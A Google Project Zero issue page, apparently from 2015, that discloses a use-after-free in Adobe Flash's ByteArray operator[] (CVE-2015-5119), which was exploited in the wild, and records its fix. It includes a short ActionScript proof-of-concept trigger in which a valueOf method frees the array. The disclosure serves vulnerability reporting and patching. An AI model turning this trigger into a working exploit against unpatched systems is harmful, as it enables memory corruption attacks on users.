Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Jul 2015
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free in ByteArray Operator[]
Project Member Reported by natashenka@google.com, Jul 1 2015 Back to list
There is a use-after-free in the ByteArray operator []. If a byte array index is set to a value with valueOf defined, this method gets called. If valueOf contains code that frees the array, such as setting its length, it will lead to a use-after-free, as the original ByteArray memory gets set as opposed to the newly allocated memory. A PoC is as follows:

		for(var i = 0; i < 1000; i++){
			var b = new ByteArray();
			b.length = 12;
			var n = new myba(b);
			
			b[0] = n;
		}

In the myba class definition:

		prototype.valueOf = function()
		{
		
		
			b.length = 1000;
			bb = new ByteArray();
			bb.length = 12;
			return 77
		}

A swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being exploited in the wild. If 7 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
memtest.as
478 bytes Download
memtest.swf
1.3 KB Download
myba.as
475 bytes Download
Comment 1 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-5119
Comment 2 by cevans@google.com, Jul 9 2015
Labels: -Restrict-View-Commit Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Sign in to add a comment